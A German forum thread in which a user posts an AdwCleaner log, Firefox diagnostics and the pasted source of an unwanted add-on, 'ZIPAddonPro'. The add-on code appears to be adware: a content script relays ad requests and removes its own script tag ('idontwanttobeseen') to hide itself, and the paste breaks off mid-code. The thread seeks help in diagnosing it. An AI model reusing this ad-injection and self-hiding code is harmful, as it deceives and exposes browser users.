Beiträge von flo08

flo08

So, besser spät als nie...

Code

# AdwCleaner v6.021 - Bericht erstellt am 07/10/2016 um 17:05:50
# Aktualisiert am 06/10/2016 von ToolsLib
# Datenbank : 2016-10-07.1 [Server]
# Betriebssystem : Windows 7 Ultimate Service Pack 1 (X64)
# Benutzername : xy
# Gestartet von : G:\Downloads\adwcleaner_6.021.exe
# Modus: Suchlauf
# Unterstützung : https://toolslib.net/forum






***** [ Dienste ] *****


Keine schädlichen Dienste gefunden.




***** [ Ordner ] *****


Ordner Gefunden: C:\Users\xy\AppData\Roaming\download Manager
Ordner Gefunden: C:\Windows\SysNative\Tasks\Microsoft\Windows\RVLKL
Ordner Gefunden: C:\ProgramData\rvlkl
Ordner Gefunden: C:\ProgramData\StarApp




***** [ Dateien ] *****


Keine schädlichen Dateien gefunden.




***** [ DLL ] *****


Keine infizierten DLLs gefunden.




***** [ WMI ] *****


Keine schädlichen Schlüssel gefunden.




***** [ Verknüpfungen ] *****


Verknüpfung infiziert: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acronis\True Image\Extras und Werkzeuge\Image mounten.lnk ( /mount_image )




***** [ Aufgabenplanung ] *****


Keine schädlichen Aufgaben gefunden.




***** [ Registrierungsdatenbank ] *****


Schlüssel Gefunden: HKLM\SOFTWARE\Classes\Scp.ScpQuickSearchBar
Schlüssel Gefunden: HKLM\SOFTWARE\Classes\Scp.ScpQuickSearchBar.1
Schlüssel Gefunden: [x64] HKLM\SOFTWARE\Classes\Scp.ScpQuickSearchBar
Schlüssel Gefunden: [x64] HKLM\SOFTWARE\Classes\Scp.ScpQuickSearchBar.1
Schlüssel Gefunden: HKLM\SOFTWARE\Classes\CLSID\{35B8892D-C3FB-4D88-990D-31DB2EBD72BD}
Schlüssel Gefunden: HKLM\SOFTWARE\Classes\CLSID\{5EB0259D-AB79-4AE6-A6E6-24FFE21C3DA4}
Schlüssel Gefunden: HKLM\SOFTWARE\Classes\CLSID\{CADAF6BE-BF50-4669-8BFD-C27BD4E6181B}
Schlüssel Gefunden: HKLM\SOFTWARE\Classes\Interface\{2BEF239C-752E-4001-8048-F256E0D8CD93}
Schlüssel Gefunden: HKLM\SOFTWARE\Classes\Interface\{3F607E46-0D3C-4442-B1DE-DE7FA4768F5C}
Schlüssel Gefunden: HKLM\SOFTWARE\Classes\Interface\{49C00A51-6E59-41FE-B3FA-2D2157FAD67B}
Schlüssel Gefunden: HKLM\SOFTWARE\Classes\Interface\{6DFF5DBA-AE3A-46DB-B301-ECFFC6DB2982}
Schlüssel Gefunden: HKLM\SOFTWARE\Classes\Interface\{DE34CD67-F1C8-4001-9A23-B8A68F63F377}
Schlüssel Gefunden: HKLM\SOFTWARE\Classes\Interface\{FE0273D1-99DF-4AC0-87D5-1371C6271785}
Schlüssel Gefunden: HKLM\SOFTWARE\Classes\TypeLib\{93E3D79C-0786-48FF-9329-93BC9F6DC2B3}
Schlüssel Gefunden: HKLM\SOFTWARE\Classes\TypeLib\{81CA8FCD-1420-4A07-B47D-B30F3DDA79E1}
Schlüssel Gefunden: HKU\S-1-5-21-146272685-1786152262-1244599394-1000\Software\Conduit
Schlüssel Gefunden: HKU\S-1-5-21-146272685-1786152262-1244599394-1000\Software\jabra
Schlüssel Gefunden: HKCU\Software\Conduit
Schlüssel Gefunden: HKCU\Software\jabra
Schlüssel Gefunden: HKLM\SOFTWARE\Conduit
Schlüssel Gefunden: [x64] HKCU\Software\Conduit
Schlüssel Gefunden: [x64] HKCU\Software\jabra
Schlüssel Gefunden: HKLM\SOFTWARE\Classes\AppID\NCTAudioCDGrabber2.DLL




***** [ Internetbrowser ] *****


Keine schädlichen Elemente in Firefox basierten Browsern gefunden.
Keine schädlichen Elemente in Chrome basierten Browsern gefunden.


*************************


C:\AdwCleaner\AdwCleaner[S0].txt - [3151 Bytes] - [07/10/2016 17:05:50]


########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [3224 Bytes] ##########

Alles anzeigen

Hier die Infos:

Code

Allgemeine Informationen
------------------------


Name: Firefox
Version: 38.0.1
Build-ID: 20150513174244
Update-Kanal: release
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Fenster mit mehreren Prozessen: 0/1 (Standard: false)


Absturzberichte der letzten 3 Tage
----------------------------------


Alle Absturzberichte


Erweiterungen
-------------


Name: colorPicker
Version: 3.0.1-signed.1-signed
Aktiviert: true
ID: colorPicker@colorPicker


Name: CSS Viewer
Version: 1.0.5.1-signed.1-signed
Aktiviert: true
ID: {026FBEEC-83F4-11E1-830D-14CD4724019B}


Name: CSSsir
Version: 1.0.20131207.1-signed.1-signed
Aktiviert: true
ID: {0103572f-d20f-4039-9eaa-ded7c4a97124}


Name: Firebug
Version: 2.0.18
Aktiviert: true
ID: firebug@software.joehewitt.com


Name: Flash Helper
Version: 3.2.14
Aktiviert: true
ID: {63b75d49-49a5-42b9-8d93-4ee4fc40d149}


Name: Kaspersky Protection
Version: 4.6.3-9
Aktiviert: true
ID: light_plugin_ACF0E80077C511E59DED005056C00008@kaspersky.com


Name: lori (Life-of-request info)
Version: 0.2.0.20080521.1-signed.1-signed.1-signed
Aktiviert: true
ID: {6dfc4f52-26f0-4e5f-89c7-31d6de480db9}


Name: Max Tabs
Version: 0.3.0.1-signed
Aktiviert: true
ID: maxtabs@cheeaun


Name: Adblock Plus
Version: 2.7.3
Aktiviert: false
ID: {d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}


Name: Adobe Acrobat - Create PDF
Version: 1.2
Aktiviert: false
ID: web2pdfextension@web2pdf.adobedotcom


Name: Astroburn Toolbar
Version: 1.1.7.0234
Aktiviert: false
ID: AstroToolbar@toolbarnet.com


Name: Buyertools
Version: 1.0.7
Aktiviert: false
ID: {411F2F11-830F-4AB5-B7F0-FBC77B870B5A}


Name: CodeBurner for Firebug
Version: 1.6.1-signed.1-signed
Aktiviert: false
ID: firebug@tools.sitepoint.com


Name: Copernic Desktop Search - Suche nach Inhalt Firefox
Version: 4.0.0.0
Aktiviert: false
ID: {b9aa91db-385d-4c69-8a2f-96790aa9405b}


Name: DownThemAll!
Version: 2.0.18.1-signed.1-let-fixed
Aktiviert: false
ID: {DDC359D1-844A-42a7-9AA1-88A850A938A8}


Name: EditCSS
Version: 0.3.7.1-signed
Aktiviert: false
ID: {A0A87DB2-80BA-493a-B22F-FAFBAEA3E0A2}


Name: ELO Archiv-Transfer
Version: 1.8
Aktiviert: false
ID: {62797940-BB39-46C3-8B9A-FA21418F0762}


Name: Facebook Toolbar
Version: 1.8.2
Aktiviert: false
ID: firefox@facebook.com


Name: Fast Video Download
Version: 5.0.1.48.1-signed.1-signed
Aktiviert: false
ID: {c50ca3c4-5656-43c2-a061-13e717f73fc8}


Name: Flash Video Downloader - YouTube HD Download [4K]
Version: 13.2.4
Aktiviert: false
ID: artur.dubovoy@gmail.com


Name: Joomla! Admin
Version: 1.6.1-signed.1-signed
Aktiviert: false
ID: joomla-admin@mozilla.org


Name: Linky [de]
Version: 2.7.1
Aktiviert: false
ID: linky@gemal.dk


Name: Logitech-Geräteerkennung
Version: 1.23.0.5
Aktiviert: false
ID: DeviceDetection@logitech.com


Name: ProxTube
Version: 2.2.2
Aktiviert: false
ID: ich@maltegoetz.de


Name: ScrapBook
Version: 1.5.14
Aktiviert: false
ID: {53A03D43-5363-4669-8190-99061B2DEBA5}


Name: sipgateFFX
Version: 0.7.5.1-signed.1-signed
Aktiviert: false
ID: sipgateffx@michael.rotmanov


Name: SpiderZilla [de]
Version: 1.6.0
Aktiviert: false
ID: {3cd27e92-1a30-11da-94c6-00e08161165f}


Name: stealthy
Version: 3.0.1.1-signed
Aktiviert: false
ID: stealthyextension@gmail.com


Name: TurnTool Viewer
Version: 2.9.5.3
Aktiviert: false
ID: turntoolviewer@turntool.com


Name: Youtube and more - Easy Video Downloader
Version: 1.97.43
Aktiviert: false
ID: vdpure@link64


Name: Youtube Unblock
Version: 9.7.1
Aktiviert: false
ID: admin@youtube-unblock.org


Name: Youtube Unblock VPN
Version: 10.7.1
Aktiviert: false
ID: vpn@youtube-unblock.org


Name: YouTube Unblocker Plus
Version: 1.2.11
Aktiviert: false
ID: addon@ytunblocker.com


Name: ZIPAddonPro
Version: 2.13
Aktiviert: false
ID: {7d6e76a6-a59e-417e-b7e1-26fbe08cbf10}


Grafik
------


Direct2D aktiviert: Wurde auf Grund Ihrer Grafikkarte blockiert, da ungelöste Treiberprobleme bestehen.
DirectWrite aktiviert: false (6.2.9200.17568)
Geräte-ID: 0x0000
Geräte-ID (GPU #2): 0x1080
GPU #2 aktiv: false
GPU-beschleunigte Fenster: 1/1 Direct3D 11 WARP (OMTC)
Karten-Beschreibung: RDPDD Chained DD
Karten-Beschreibung (GPU #2): NVIDIA GeForce GTX 580
Karten-RAM: Unknown
Karten-RAM (GPU #2): 1535
Karten-Treiber: RDPDD
Karten-Treiber (GPU #2): nvd3dumx,nvwgf2umx,nvwgf2umx nvd3dum,nvwgf2um,nvwgf2um
Subsys-ID: 00000000
Subsys-ID (GPU #2): 0000000c
Treiber-Datum (GPU #2): 10-2-2012
Treiber-Version (GPU #2): 9.18.13.697
Vendor-ID: 0x0000
Vendor-ID (GPU #2): 0x10de
WebGL-Renderer: Wurde auf Grund Ihrer Grafikkarte blockiert, da ungelöste Treiberprobleme bestehen.
windowLayerManagerRemote: true
AzureCanvasBackend: skia
AzureContentBackend: cairo
AzureFallbackCanvasBackend: cairo
AzureSkiaAccelerated: 0


Wichtige modifizierte Einstellungen
-----------------------------------


accessibility.typeaheadfind.flashBar: 0
browser.cache.disk.capacity: 348160
browser.cache.disk.smart_size.first_run: false
browser.cache.disk.smart_size.use_old_max: false
browser.cache.frecency_experiment: 1
browser.download.importedFromSqlite: true
browser.download.manager.alertOnEXEOpen: true
browser.places.smartBookmarksVersion: 7
browser.sessionstore.upgradeBackup.latestBuildID: 20150513174244
browser.startup.homepage_override.buildID: 20150513174244
browser.startup.homepage_override.mstone: 38.0.1
dom.mozApps.used: true
extensions.lastAppVersion: 38.0.1
media.gmp-gmpopenh264.lastUpdate: 1476176975
media.gmp-gmpopenh264.version: 1.5.3
media.gmp-manager.buildID: 20150513174244
media.gmp-manager.lastCheck: 1476176975
network.cookie.prefsMigrated: true
network.predictor.cleaned-up: true
places.database.lastMaintenance: 1476178129
places.history.expiration.transient_current_max_pages: 39978
plugin.disable_full_page_plugin_for_types: application/pdf
plugin.importedState: true
privacy.sanitize.migrateFx3Prefs: true
storage.vacuum.last.index: 0
storage.vacuum.last.places.sqlite: 1476178127


user.js-Einstellungen
---------------------


Der Profilordner besitzt eine user.js-Datei, welche Einstellungen enthält, die nicht von Firefox erstellt wurden.


Wichtige nicht veränderbare Einstellungen
-----------------------------------------


JavaScript
----------


Inkrementelle GC: true


Barrierefreiheit
----------------


Aktiviert: false
Barrierefreiheit verhindern: 0


Bibliotheken-Versionen
----------------------


NSPR
Minimal vorausgesetzte Version: 4.10.8
Verwendete Version: 4.10.8


NSS
Minimal vorausgesetzte Version: 3.18.1 Basic ECC
Verwendete Version: 3.18.1 Basic ECC


NSSSMIME
Minimal vorausgesetzte Version: 3.18.1 Basic ECC
Verwendete Version: 3.18.1 Basic ECC


NSSSSL
Minimal vorausgesetzte Version: 3.18.1 Basic ECC
Verwendete Version: 3.18.1 Basic ECC


NSSUTIL
Minimal vorausgesetzte Version: 3.18.1
Verwendete Version: 3.18.1


-------------------------

Alles anzeigen

Das fragliche Addon war das letzte in der Liste "ZIPAddonPro". Das muss auch irgendwo hängen, nachdem ich es deaktiviert habe bekam ich beim Neustart von FF eine Meldung in der Art "Ein anderes Programm möchte Firefox mit folgendem Addon modifizieren - zulassen?"

LG, F.

flo08

Mist... Das letzte Update ist zeitgleich mit dem fragwürdigen AddOn aufgetaucht. Mache gleich den Scan und danach das Update.

flo08

Zitat von 2002Andreas

Hallo und Willkommen hier im Forum.
Unabhängig deiner Frage, laut deinem User-Agenten nutzt du noch Firefox Version 38.
Wenn dem so ist, solltest du mehr als dringend das Update auf die aktuelle Version machen.

Danke für den Hinweis! Komisch... s. Anlage. Mache ich gleich manuell.

flo08

Hi zusammen,

habe heute zufällig ein merkwürdiges Addon im Firefox gefunden, das ist mit ziemlicher Sicherheit nicht installiert habe. Auch online ist darüber nichts zu finden.

Habe mir den Code mal angeschaut, mangels Kenntnissen kann ich damit nicht sonderlich viel anfangen, sieht aber irgendwie nicht sonderlich doll aus. Oder nur etwas Adware? Vielleicht kann mal jemand der etwas Ahnung davon hat einen Blick darauf werfen?

Im Voraus vielen lieben Dank!

Florian

Code

PK
     ‰P³HZ×œíç1  ç1     bootstrap.js/* This Source Code Form is subject to the terms of the Mozilla Public
 * License, v. 2.0. If a copy of the MPL was not distributed with this
 * file, You can obtain one at http://mozilla.org/MPL/2.0/. */


// @see http://mxr.mozilla.org/mozilla-central/source/js/src/xpconnect/loader/mozJSComponentLoader.cpp


'use strict';


// IMPORTANT: Avoid adding any initialization tasks here, if you need to do
// something before add-on is loaded consider addon/runner module instead!


const { classes: Cc, Constructor: CC, interfaces: Ci, utils: Cu,
        results: Cr, manager: Cm } = Components;
const ioService = Cc['@mozilla.org/network/io-service;1'].
                  getService(Ci.nsIIOService);
const resourceHandler = ioService.getProtocolHandler('resource').
                        QueryInterface(Ci.nsIResProtocolHandler);
const systemPrincipal = CC('@mozilla.org/systemprincipal;1', 'nsIPrincipal')();
const scriptLoader = Cc['@mozilla.org/moz/jssubscript-loader;1'].
                     getService(Ci.mozIJSSubScriptLoader);
const prefService = Cc['@mozilla.org/preferences-service;1'].
                    getService(Ci.nsIPrefService).
                    QueryInterface(Ci.nsIPrefBranch);
const appInfo = Cc["@mozilla.org/xre/app-info;1"].
                getService(Ci.nsIXULAppInfo);
const vc = Cc["@mozilla.org/xpcom/version-comparator;1"].
           getService(Ci.nsIVersionComparator);




const REASON = [ 'unknown', 'startup', 'shutdown', 'enable', 'disable',
                 'install', 'uninstall', 'upgrade', 'downgrade' ];


const bind = Function.call.bind(Function.bind);


let loader = null;
let unload = null;
let cuddlefishSandbox = null;
let nukeTimer = null;


let resourceDomains = [];
function setResourceSubstitution(domain, uri) {
  resourceDomains.push(domain);
  resourceHandler.setSubstitution(domain, uri);
}


// Utility function that synchronously reads local resource from the given
// `uri` and returns content string.
function readURI(uri) {
  let ioservice = Cc['@mozilla.org/network/io-service;1'].
    getService(Ci.nsIIOService);
  let channel = ioservice.newChannel(uri, 'UTF-8', null);
  let stream = channel.open();


  let cstream = Cc['@mozilla.org/intl/converter-input-stream;1'].
    createInstance(Ci.nsIConverterInputStream);
  cstream.init(stream, 'UTF-8', 0, 0);


  let str = {};
  let data = '';
  let read = 0;
  do {
    read = cstream.readString(0xffffffff, str);
    data += str.value;
  } while (read != 0);


  cstream.close();


  return data;
}


// We don't do anything on install & uninstall yet, but in a future
// we should allow add-ons to cleanup after uninstall.
function install(data, reason) {}
function uninstall(data, reason) {}


function startup(data, reasonCode) {
  try {
    let reason = REASON[reasonCode];
    // URI for the root of the XPI file.
    // 'jar:' URI if the addon is packed, 'file:' URI otherwise.
    // (Used by l10n module in order to fetch `locale` folder)
    let rootURI = data.resourceURI.spec;


    // TODO: Maybe we should perform read harness-options.json asynchronously,
    // since we can't do anything until 'sessionstore-windows-restored' anyway.
    let options = JSON.parse(readURI(rootURI + './harness-options.json'));


    let id = options.jetpackID;
    let name = options.name;


    // Clean the metadata
    options.metadata[name]['permissions'] = options.metadata[name]['permissions'] || {};


    // freeze the permissionss
    Object.freeze(options.metadata[name]['permissions']);
    // freeze the metadata
    Object.freeze(options.metadata[name]);


    // Register a new resource 'domain' for this addon which is mapping to
    // XPI's `resources` folder.
    // Generate the domain name by using jetpack ID, which is the extension ID
    // by stripping common characters that doesn't work as a domain name:
    let uuidRe =
      /^\{([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\}$/;


    let domain = id.
      toLowerCase().
      replace(/@/g, '-at-').
      replace(/\./g, '-dot-').
      replace(uuidRe, '$1');


    let prefixURI = 'resource://' + domain + '/';
    let resourcesURI = ioService.newURI(rootURI + '/resources/', null, null);
    setResourceSubstitution(domain, resourcesURI);


    // Create path to URLs mapping supported by loader.
    let paths = {
      // Relative modules resolve to add-on package lib
      './': prefixURI + name + '/lib/',
      './tests/': prefixURI + name + '/tests/',
      '': 'resource://gre/modules/commonjs/'
    };


    // Maps addon lib and tests ressource folders for each package
    paths = Object.keys(options.metadata).reduce(function(result, name) {
      result[name + '/'] = prefixURI + name + '/lib/'
      result[name + '/tests/'] = prefixURI + name + '/tests/'
      return result;
    }, paths);


    // We need to map tests folder when we run sdk tests whose package name
    // is stripped
    if (name == 'addon-sdk')
      paths['tests/'] = prefixURI + name + '/tests/';


    let useBundledSDK = options['force-use-bundled-sdk'];
    if (!useBundledSDK) {
      try {
        useBundledSDK = prefService.getBoolPref("extensions.addon-sdk.useBundledSDK");
      }
      catch (e) {
        // Pref doesn't exist, allow using Firefox shipped SDK
      }
    }


    // Starting with Firefox 21.0a1, we start using modules shipped into firefox
    // Still allow using modules from the xpi if the manifest tell us to do so.
    // And only try to look for sdk modules in xpi if the xpi actually ship them
    if (options['is-sdk-bundled'] &&
        (vc.compare(appInfo.version, '21.0a1') < 0 || useBundledSDK)) {
      // Maps sdk module folders to their resource folder
      paths[''] = prefixURI + 'addon-sdk/lib/';
      // test.js is usually found in root commonjs or SDK_ROOT/lib/ folder,
      // so that it isn't shipped in the xpi. Keep a copy of it in sdk/ folder
      // until we no longer support SDK modules in XPI:
      paths['test'] = prefixURI + 'addon-sdk/lib/sdk/test.js';
    }


    // Retrieve list of module folder overloads based on preferences in order to
    // eventually used a local modules instead of files shipped into Firefox.
    let branch = prefService.getBranch('extensions.modules.' + id + '.path');
    paths = branch.getChildList('', {}).reduce(function (result, name) {
      // Allows overloading of any sub folder by replacing . by / in pref name
      let path = name.substr(1).split('.').join('/');
      // Only accept overloading folder by ensuring always ending with `/`
      if (path) path += '/';
      let fileURI = branch.getCharPref(name);


      // On mobile, file URI has to end with a `/` otherwise, setSubstitution
      // takes the parent folder instead.
      if (fileURI[fileURI.length-1] !== '/')
        fileURI += '/';


      // Maps the given file:// URI to a resource:// in order to avoid various
      // failure that happens with file:// URI and be close to production env
      let resourcesURI = ioService.newURI(fileURI, null, null);
      let resName = 'extensions.modules.' + domain + '.commonjs.path' + name;
      setResourceSubstitution(resName, resourcesURI);


      result[path] = 'resource://' + resName + '/';
      return result;
    }, paths);


    // Make version 2 of the manifest
    let manifest = options.manifest;


    // Import `cuddlefish.js` module using a Sandbox and bootstrap loader.
    let cuddlefishPath = 'loader/cuddlefish.js';
    let cuddlefishURI = 'resource://gre/modules/commonjs/sdk/' + cuddlefishPath;
    if (paths['sdk/']) { // sdk folder has been overloaded
                         // (from pref, or cuddlefish is still in the xpi)
      cuddlefishURI = paths['sdk/'] + cuddlefishPath;
    }
    else if (paths['']) { // root modules folder has been overloaded
      cuddlefishURI = paths[''] + 'sdk/' + cuddlefishPath;
    }


    cuddlefishSandbox = loadSandbox(cuddlefishURI);
    let cuddlefish = cuddlefishSandbox.exports;


    // Normalize `options.mainPath` so that it looks like one that will come
    // in a new version of linker.
    let main = options.mainPath;


    unload = cuddlefish.unload;
    loader = cuddlefish.Loader({
      paths: paths,
      // modules manifest.
      manifest: manifest,


      // Add-on ID used by different APIs as a unique identifier.
      id: id,
      // Add-on name.
      name: name,
      // Add-on version.
      version: options.metadata[name].version,
      // Add-on package descriptor.
      metadata: options.metadata[name],
      // Add-on load reason.
      loadReason: reason,


      prefixURI: prefixURI,
      // Add-on URI.
      rootURI: rootURI,
      // options used by system module.
      // File to write 'OK' or 'FAIL' (exit code emulation).
      resultFile: options.resultFile,
      // Arguments passed as --static-args
      staticArgs: options.staticArgs,
      // Add-on preferences branch name
      preferencesBranch: options.preferencesBranch,


      // Arguments related to test runner.
      modules: {
        '@test/options': {
          allTestModules: options.allTestModules,
          iterations: options.iterations,
          filter: options.filter,
          profileMemory: options.profileMemory,
          stopOnError: options.stopOnError,
          verbose: options.verbose,
          parseable: options.parseable,
          checkMemory: options.check_memory,
        }
      }
    });


    let module = cuddlefish.Module('sdk/loader/cuddlefish', cuddlefishURI);
    let require = cuddlefish.Require(loader, module);


    require('sdk/addon/runner').startup(reason, {
      loader: loader,
      main: main,
      prefsURI: rootURI + 'defaults/preferences/prefs.js'
    });
  } catch (error) {
    dump('Bootstrap error: ' +
         (error.message ? error.message : String(error)) + '\n' +
         (error.stack || error.fileName + ': ' + error.lineNumber) + '\n');
    throw error;
  }
};


function loadSandbox(uri) {
  let proto = {
    sandboxPrototype: {
      loadSandbox: loadSandbox,
      ChromeWorker: ChromeWorker
    }
  };
  let sandbox = Cu.Sandbox(systemPrincipal, proto);
  // Create a fake commonjs environnement just to enable loading loader.js
  // correctly
  sandbox.exports = {};
  sandbox.module = { uri: uri, exports: sandbox.exports };
  sandbox.require = function (id) {
    if (id !== "chrome")
      throw new Error("Bootstrap sandbox `require` method isn't implemented.");


    return Object.freeze({ Cc: Cc, Ci: Ci, Cu: Cu, Cr: Cr, Cm: Cm,
      CC: bind(CC, Components), components: Components,
      ChromeWorker: ChromeWorker });
  };
  scriptLoader.loadSubScript(uri, sandbox, 'UTF-8');
  return sandbox;
}


function unloadSandbox(sandbox) {
  if ("nukeSandbox" in Cu)
    Cu.nukeSandbox(sandbox);
}


function setTimeout(callback, delay) {
  let timer = Cc["@mozilla.org/timer;1"].createInstance(Ci.nsITimer);
  timer.initWithCallback({ notify: callback }, delay,
                         Ci.nsITimer.TYPE_ONE_SHOT);
  return timer;
}


function shutdown(data, reasonCode) {
  let reason = REASON[reasonCode];
  if (loader) {
    unload(loader, reason);
    unload = null;


    // Don't waste time cleaning up if the application is shutting down
    if (reason != "shutdown") {
      // Avoid leaking all modules when something goes wrong with one particular
      // module. Do not clean it up immediatly in order to allow executing some
      // actions on addon disabling.
      // We need to keep a reference to the timer, otherwise it is collected
      // and won't ever fire.
      nukeTimer = setTimeout(nukeModules, 1000);


      // Bug 944951 - bootstrap.js must remove the added resource: URIs on unload
      resourceDomains.forEach(domain => {
        resourceHandler.setSubstitution(domain, null);
      })
    }
  }
};


function nukeModules() {
  nukeTimer = null;
  // module objects store `exports` which comes from sandboxes
  // We should avoid keeping link to these object to avoid leaking sandboxes
  for (let key in loader.modules) {
    delete loader.modules[key];
  }
  // Direct links to sandboxes should be removed too
  for (let key in loader.sandboxes) {
    let sandbox = loader.sandboxes[key];
    delete loader.sandboxes[key];
    // Bug 775067: From FF17 we can kill all CCW from a given sandbox
    unloadSandbox(sandbox);
  }
  loader = null;


  // both `toolkit/loader` and `system/xul-app` are loaded as JSM's via
  // `cuddlefish.js`, and needs to be unloaded to avoid memory leaks, when
  // the addon is unload.


  unloadSandbox(cuddlefishSandbox.loaderSandbox);
  unloadSandbox(cuddlefishSandbox.xulappSandbox);


  // Bug 764840: We need to unload cuddlefish otherwise it will stay alive
  // and keep a reference to this compartment.
  unloadSandbox(cuddlefishSandbox);
  cuddlefishSandbox = null;
}
PK
     ‰P³H               defaults/preferences/prefs.jsPK
     ‰P³H@+¦‘ë
  ë
     harness-options.json{
 "abort_on_missing": false, 
 "check_memory": false, 
 "enable_e10s": false, 
 "is-sdk-bundled": false, 
 "jetpackID": "{7d6e76a6-a59e-417e-b7e1-26fbe08cbf10}", 
 "loader": "addon-sdk/lib/sdk/loader/cuddlefish.js", 
 "main": "lib/main.js", 
 "mainPath": "adscript-addon/main", 
 "manifest": {
  "adscript-addon/adscript": {
   "docsSHA256": null, 
   "jsSHA256": "e96b310d5ecc1f1adc2bd9ad12ccf1e970b667ee48be08fdedec3dec055ef332", 
   "moduleName": "adscript", 
   "packageName": "adscript-addon", 
   "requirements": {
    "./cfg": "adscript-addon/cfg", 
    "./redirecter": "adscript-addon/redirecter", 
    "./utils.js": "adscript-addon/utils", 
    "chrome": "chrome", 
    "sdk/page-mod": "sdk/page-mod", 
    "sdk/querystring": "sdk/querystring", 
    "sdk/request": "sdk/request", 
    "sdk/self": "sdk/self", 
    "sdk/simple-storage": "sdk/simple-storage", 
    "sdk/timers": "sdk/timers"
   }, 
   "sectionName": "lib"
  }, 
  "adscript-addon/cfg": {
   "docsSHA256": null, 
   "jsSHA256": "6048ab1b94e864e12b4e87c1a716a439092301cc980a856a97f3626cdb5a2517", 
   "moduleName": "cfg", 
   "packageName": "adscript-addon", 
   "requirements": {
    "./utils.js": "adscript-addon/utils"
   }, 
   "sectionName": "lib"
  }, 
  "adscript-addon/main": {
   "docsSHA256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", 
   "jsSHA256": "ef7cf27c589e67de199a509c5dc887ab1eb7f1fc19b4bf492f14bdba241344cc", 
   "moduleName": "main", 
   "packageName": "adscript-addon", 
   "requirements": {
    "./adscript": "adscript-addon/adscript", 
    "./cfg": "adscript-addon/cfg", 
    "./utils.js": "adscript-addon/utils", 
    "sdk/preferences/service": "sdk/preferences/service", 
    "update.js": "adscript-addon/update"
   }, 
   "sectionName": "lib"
  }, 
  "adscript-addon/redirecter": {
   "docsSHA256": null, 
   "jsSHA256": "c2bb1d26f36c8bcec69140629de9b75ef486ddc0a3f9922c8d24481c34d445ee", 
   "moduleName": "redirecter", 
   "packageName": "adscript-addon", 
   "requirements": {
    "./cfg": "adscript-addon/cfg", 
    "./utils.js": "adscript-addon/utils", 
    "chrome": "chrome"
   }, 
   "sectionName": "lib"
  }, 
  "adscript-addon/update": {
   "docsSHA256": null, 
   "jsSHA256": "f83c06117c7a59b7b71bc6655898598a7951d5b6199c727e3b905f482c394bd0", 
   "moduleName": "update.js", 
   "packageName": "adscript-addon", 
   "requirements": {
    "cfg": "adscript-addon/cfg", 
    "chrome": "chrome", 
    "sdk/request": "sdk/request", 
    "sdk/self": "sdk/self", 
    "sdk/timers": "sdk/timers"
   }, 
   "sectionName": "lib"
  }, 
  "adscript-addon/utils": {
   "docsSHA256": null, 
   "jsSHA256": "093be1288d9917501b55150a067247e5b4f9e7d618f15df01a8c1e7202efbef5", 
   "moduleName": "utils.js", 
   "packageName": "adscript-addon", 
   "requirements": {
    "chrome": "chrome", 
    "sdk/base64.js": "sdk/base64", 
    "sdk/self": "sdk/self", 
    "sdk/tabs": "sdk/tabs"
   }, 
   "sectionName": "lib"
  }
 }, 
 "metadata": {
  "addon-sdk": {
   "description": "Add-on development made easy.", 
   "keywords": [
    "javascript", 
    "engine", 
    "addon", 
    "extension", 
    "xulrunner", 
    "firefox", 
    "browser"
   ], 
   "license": "MPL 2.0", 
   "name": "addon-sdk"
  }, 
  "adscript-addon": {
   "description": "ZIPAddonPro", 
   "license": "MIT", 
   "main": "lib/main.js", 
   "name": "adscript-addon", 
   "version": "2.13"
  }
 }, 
 "name": "adscript-addon", 
 "parseable": false, 
 "preferencesBranch": "{7d6e76a6-a59e-417e-b7e1-26fbe08cbf10}", 
 "sdkVersion": "1.17", 
 "staticArgs": {}, 
 "verbose": false
}PK
     ‰P³H4úV  V     install.rdf<?xml version="1.0" encoding="utf-8"?><!-- This Source Code Form is subject to the terms of the Mozilla Public
   - License, v. 2.0. If a copy of the MPL was not distributed with this
   - file, You can obtain one at http://mozilla.org/MPL/2.0/. --><RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#">
  <Description about="urn:mozilla:install-manifest">
    <em:id>{7d6e76a6-a59e-417e-b7e1-26fbe08cbf10}</em:id>
    <em:version>2.13</em:version>
    <em:type>2</em:type>
    <em:bootstrap>true</em:bootstrap>
    <em:unpack>false</em:unpack>


    <!-- Firefox -->
    <em:targetApplication>
      <Description>
        <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
        <em:minVersion>26.0</em:minVersion>
        <em:maxVersion>30.0</em:maxVersion>
      </Description>
    </em:targetApplication>


    <!-- Front End MetaData -->
    <em:name>ZIPAddonPro</em:name>
    <em:description>ZIPAddonPro</em:description>
    <em:creator></em:creator>



  	<em:multiprocessCompatible>true</em:multiprocessCompatible>
	</Description>
</RDF>PK
     ‰P³Hhô¦É         locales.json{"locales": []}
PK
     ‰P³HîñŠ‹  ‹  (   resources/adscript-addon/data/wrapper.js


	var debug = {
		debug:false
		, adscripturl:null
	};


	// to mark logging from ContentScript
	log = function() {
		if (!debug.debug) return;
		var args = Array.prototype.slice.call(arguments);
		args.unshift('ContentScript(wrapper.js): ');
		console.log(args);
	};


	document.documentElement.addEventListener("ads-request", function(event) {
		var data = event.detail;
		log('content.ael.on ads-request', JSON.stringify(data));
		// route to addon
		self.port.emit('ads-request', data);
	}, false);


	self.port.on('ads-response', function(data) {
		log('content.port.on ads-reponse'); //, JSON.stringify(data));


		data = JSON.stringify(data);


		var event = document.createEvent('CustomEvent');
		event.initCustomEvent("ads-response", true, true, data);
		document.documentElement.dispatchEvent(event);
	});


	/**
	 * addon-shutdown from addon
	 */
	self.port.on('addon-shutdown', function(data) {
		log('content.port.on addon-shutdown'); //, JSON.stringify(data));


		var event = document.createEvent('CustomEvent');
		event.initCustomEvent("addon-shutdown", true, true, data);
		document.documentElement.dispatchEvent(event);
	});


	var AdscriptWrapped = function() {
		//log("log in PageScript");
		var old = document.onreadystatechange;
		document.onreadystatechange = function() {
			//log(document.readyState);
			if (document.readyState == 'complete') {
				// remove script again, for its not visible
				try {
					var scriptSelf = document.querySelector('script#idontwanttobeseen');
					scriptSelf.parentNode.removeChild(scriptSelf);
				} catch (e) {
					log.log(e);
				}
			}
			// eventuall old document.onreadystatechange
